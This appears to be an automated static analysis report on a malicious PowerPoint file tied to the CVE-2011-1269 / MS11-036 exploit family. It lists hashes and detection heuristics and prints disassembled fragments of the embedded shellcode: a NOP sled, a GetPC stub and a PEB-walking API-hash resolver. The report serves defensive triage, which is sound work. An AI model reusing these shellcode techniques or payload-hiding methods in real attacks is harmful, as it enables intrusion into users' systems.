Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bf47306ea5f08229…

MALICIOUS

Office (OLE)

215.0 KB Created: 1601-01-01 00:00:00 Authoring application: Microsoft PowerPoint First seen: 2012-06-14
MD5: b1607a55e0e9ec04561b4ee61031c27b SHA-1: 6deb424cfbd0ebd1c44b37210cacf90e6d7d3487 SHA-256: bf47306ea5f0822949bf017621d3f3027d16334c1b12b0089a08d566af654c28
480 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1055 Process Injection

The file is a PowerPoint document containing a binary-format RCE payload, specifically identified as belonging to the CVE-2011-1269 / MS11-036 family. Static analysis detected raw shellcode, PEB access, and an API hash resolver, indicating the payload is designed to execute arbitrary code. The payload is likely injected into a running process, as suggested by the 'process-injection shellcode' finding.

Heuristics 11

  • PowerPoint binary-format RCE payload — CVE-2011-1269 / MS11-036 family critical CVE likely PPT_BINARY_MEMORY_CORRUPTION_PAYLOAD
    A macro-free binary PowerPoint (.ppt) document carries a native code payload (embedded PE and/or process-injection shellcode), staged in an oversized binary stream. Legitimate presentations do not embed executables or shellcode; this is the payload half of a PowerPoint memory-corruption exploit (CVE-2011-1269 / MS11-036 family; the same record-overflow delivery is shared with CVE-2010-2572 and CVE-2009-0556).
  • XOR-encoded strings (key 0x92) critical SC_XOR_ENCODED
    Found 2 Windows library/API name(s) XOR-encoded with single-byte key 0x92: 'advapi32.dll', 'shell32.dll'
    Disassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'xchg' is 55% of instructions — a sled or padding/filler run, not program logic).
  • Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • NOP sled detected high SC_NOP_SLED
    Found 20+ consecutive 0x90 bytes
    Disassembly
    x86 disassembly · validity: uncertain (0.662) — 9/11 branch targets land on an instruction boundary (82% coherence)
    00030E2C  90                nop
    00030E2D  90                nop
    00030E2E  90                nop
    00030E2F  90                nop
    00030E30  90                nop
    00030E31  90                nop
    00030E32  90                nop
    00030E33  90                nop
    00030E34  90                nop
    00030E35  90                nop
    00030E36  90                nop
    00030E37  90                nop
    00030E38  90                nop
    00030E39  90                nop
    00030E3A  90                nop
    00030E3B  90                nop
    00030E3C  90                nop
    00030E3D  90                nop
    00030E3E  90                nop
    00030E3F  90                nop
    00030E40  90                nop
    00030E41  90                nop
    00030E42  90                nop
    00030E43  90                nop
    00030E44  90                nop
    00030E45  90                nop
    00030E46  90                nop
    00030E47  90                nop
    00030E48  90                nop
    00030E49  90                nop
    00030E4A  90                nop
    00030E4B  90                nop
    00030E4C  81ec00080000      sub esp, 0x800
    00030E52  60                pushal
    00030E53  e800000000        call 0x30e58
    00030E58  5b                pop ebx
    00030E59  81ebac104000      sub ebx, 0x4010ac
    00030E5F  eb30              jmp 0x30e91
    00030E61  16                push ss
    00030E62  65fa              cli
    00030E64  10ec              adc ah, ch
    00030E66  97                xchg edi, eax
    00030E67  030cf6            add ecx, dword ptr [esi + esi*8]
    00030E6A  22b97cac08da      and bh, byte ptr [ecx - 0x25f75384]
    00030E70  76ad              jbe 0x30e1f
    00030E72  9b                wait
    00030E73  7ddf              jge 0x30e54
    00030E75  fb                sti
    00030E76  97                xchg edi, eax
    00030E77  fd                std
    00030E78  0f7ed8            movd eax, mm3
    00030E7B  e273              loop 0x30ef0
    00030E7D  ff                .byte 0xff
    00030E7E  ff                .byte 0xff
    00030E7F  ff                .byte 0xff
    00030E80  ff                .byte 0xff
    00030E81  ff                .byte 0xff
    00030E82  ff                .byte 0xff
    00030E83  ff                .byte 0xff
    00030E84  ff                .byte 0xff
    00030E85  ff                .byte 0xff
    00030E86  ff                .byte 0xff
    00030E87  ff                .byte 0xff
    00030E88  ff                .byte 0xff
    00030E89  ff                .byte 0xff
    00030E8A  ff                .byte 0xff
    00030E8B  ff                .byte 0xff
  • x86 GetPC stub (CALL $+5; POP EBX) high SC_GETPC_CALL
    x86 GetPC stub (CALL $+5; POP EBX)
    Disassembly
    x86 disassembly · validity: uncertain (0.619) — 9/12 branch targets land on an instruction boundary (75% coherence)
    00030E53  e800000000        call 0x30e58
    00030E58  5b                pop ebx
    00030E59  81ebac104000      sub ebx, 0x4010ac
    00030E5F  eb30              jmp 0x30e91
    00030E61  16                push ss
    00030E62  65fa              cli
    00030E64  10ec              adc ah, ch
    00030E66  97                xchg edi, eax
    00030E67  030cf6            add ecx, dword ptr [esi + esi*8]
    00030E6A  22b97cac08da      and bh, byte ptr [ecx - 0x25f75384]
    00030E70  76ad              jbe 0x30e1f
    00030E72  9b                wait
    00030E73  7ddf              jge 0x30e54
    00030E75  fb                sti
    00030E76  97                xchg edi, eax
    00030E77  fd                std
    00030E78  0f7ed8            movd eax, mm3
    00030E7B  e273              loop 0x30ef0
    00030E7D  ff                .byte 0xff
    00030E7E  ff                .byte 0xff
    00030E7F  ff                .byte 0xff
    00030E80  ff                .byte 0xff
    00030E81  ff                .byte 0xff
    00030E82  ff                .byte 0xff
    00030E83  ff                .byte 0xff
    00030E84  ff                .byte 0xff
    00030E85  ff                .byte 0xff
    00030E86  ff                .byte 0xff
    00030E87  ff                .byte 0xff
    00030E88  ff                .byte 0xff
    00030E89  ff                .byte 0xff
    00030E8A  ff                .byte 0xff
    00030E8B  ff                .byte 0xff
    00030E8C  ffa6f3217064      jmp dword ptr [esi + 0x647021f3]
    00030E92  a130000000        mov eax, dword ptr [0x30]
    00030E97  8b400c            mov eax, dword ptr [eax + 0xc]
    00030E9A  8b701c            mov esi, dword ptr [eax + 0x1c]
    00030E9D  ad                lodsd eax, dword ptr [esi]
    00030E9E  8b4008            mov eax, dword ptr [eax + 8]
    00030EA1  8983d1104000      mov dword ptr [ebx + 0x4010d1], eax
    00030EA7  fc                cld
    00030EA8  8dbbb5104000      lea edi, [ebx + 0x4010b5]
    00030EAE  33c9              xor ecx, ecx
    00030EB0  b107              mov cl, 7
    00030EB2  e8                .byte 0xe8
  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    x86 disassembly · validity: code (0.944) — 9/10 branch targets land on an instruction boundary (90% coherence)
    00030E91  64a130000000      mov eax, dword ptr fs:[0x30]
    00030E97  8b400c            mov eax, dword ptr [eax + 0xc]
    00030E9A  8b701c            mov esi, dword ptr [eax + 0x1c]
    00030E9D  ad                lodsd eax, dword ptr [esi]
    00030E9E  8b4008            mov eax, dword ptr [eax + 8]
    00030EA1  8983d1104000      mov dword ptr [ebx + 0x4010d1], eax
    00030EA7  fc                cld
    00030EA8  8dbbb5104000      lea edi, [ebx + 0x4010b5]
    00030EAE  33c9              xor ecx, ecx
    00030EB0  b107              mov cl, 7
    00030EB2  e8f0000000        call 0x30fa7
    00030EB7  83c704            add edi, 4
    00030EBA  e2f6              loop 0x30eb2
    00030EBC  fc                cld
    00030EBD  33c0              xor eax, eax
    00030EBF  b4c3              mov ah, 0xc3
    00030EC1  8bb3b5104000      mov esi, dword ptr [ebx + 0x4010b5]
    00030EC7  ac                lodsb al, byte ptr [esi]
    00030EC8  38c4              cmp ah, al
    00030ECA  7402              je 0x30ece
    00030ECC  ebf9              jmp 0x30ec7
    00030ECE  4e                dec esi
    00030ECF  89b3e1104000      mov dword ptr [ebx + 0x4010e1], esi
    00030ED5  33f6              xor esi, esi
    00030ED7  eb1a              jmp 0x30ef3
    00030ED9  6a00              push 0
    00030EDB  56                push esi
    00030EDC  ff93c5104000      call dword ptr [ebx + 0x4010c5]
    00030EE2  3d00500300        cmp eax, 0x35000
    00030EE7  7609              jbe 0x30ef2
    00030EE9  3d00600300        cmp eax, 0x36000
    00030EEE  7302              jae 0x30ef2
    00030EF0  eb                .byte 0xeb
  • PEB API-hash resolver high SC_API_HASH_RESOLVER
    PEB access followed by ROR13-style API hashing, a common position-independent shellcode import resolver
    Disassembly
    x86 disassembly · validity: code (0.944) — 9/10 branch targets land on an instruction boundary (90% coherence)
    00030E91  64a130000000      mov eax, dword ptr fs:[0x30]
    00030E97  8b400c            mov eax, dword ptr [eax + 0xc]
    00030E9A  8b701c            mov esi, dword ptr [eax + 0x1c]
    00030E9D  ad                lodsd eax, dword ptr [esi]
    00030E9E  8b4008            mov eax, dword ptr [eax + 8]
    00030EA1  8983d1104000      mov dword ptr [ebx + 0x4010d1], eax
    00030EA7  fc                cld
    00030EA8  8dbbb5104000      lea edi, [ebx + 0x4010b5]
    00030EAE  33c9              xor ecx, ecx
    00030EB0  b107              mov cl, 7
    00030EB2  e8f0000000        call 0x30fa7
    00030EB7  83c704            add edi, 4
    00030EBA  e2f6              loop 0x30eb2
    00030EBC  fc                cld
    00030EBD  33c0              xor eax, eax
    00030EBF  b4c3              mov ah, 0xc3
    00030EC1  8bb3b5104000      mov esi, dword ptr [ebx + 0x4010b5]
    00030EC7  ac                lodsb al, byte ptr [esi]
    00030EC8  38c4              cmp ah, al
    00030ECA  7402              je 0x30ece
    00030ECC  ebf9              jmp 0x30ec7
    00030ECE  4e                dec esi
    00030ECF  89b3e1104000      mov dword ptr [ebx + 0x4010e1], esi
    00030ED5  33f6              xor esi, esi
    00030ED7  eb1a              jmp 0x30ef3
    00030ED9  6a00              push 0
    00030EDB  56                push esi
    00030EDC  ff93c5104000      call dword ptr [ebx + 0x4010c5]
    00030EE2  3d00500300        cmp eax, 0x35000
    00030EE7  7609              jbe 0x30ef2
    00030EE9  3d00600300        cmp eax, 0x36000
    00030EEE  7302              jae 0x30ef2
    00030EF0  eb                .byte 0xeb
  • OLE file contains raw shellcode-like resolver payload high OLE_RAW_SHELLCODE_PAYLOAD
    Malformed or legacy OLE file contains raw PEB/API-resolver shellcode bytes at the file level, including loader-walk instructions and a nearby payload marker. This indicates an exploit payload carrier but does not identify a specific parser CVE.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    This finding applies to a carved embedded Office document found at a nonzero offset inside the submitted file, not directly to the top-level document. OLE file is 158,720 bytes but its declared streams total only 49,564 bytes — 109,156 bytes (69%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • OLE file has appended executable-looking payload bytes high OLE_APPENDED_PAYLOAD
    This finding applies to a carved embedded Office document found at a nonzero offset inside the submitted file, not directly to the top-level document. OLE compound file contains a large high-entropy region beyond the declared major streams and that region includes shellcode, PE, or loader API markers. This is a payload-carrier signal, not a specific CVE attribution by itself.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
embedded_office_off0000f000.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0xF000 158720 bytes
SHA-256: ce63127fd658685d5fad80bb8df90292e46b9d3eaa2be9b01d5bc68d17d8b42c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: NOP sled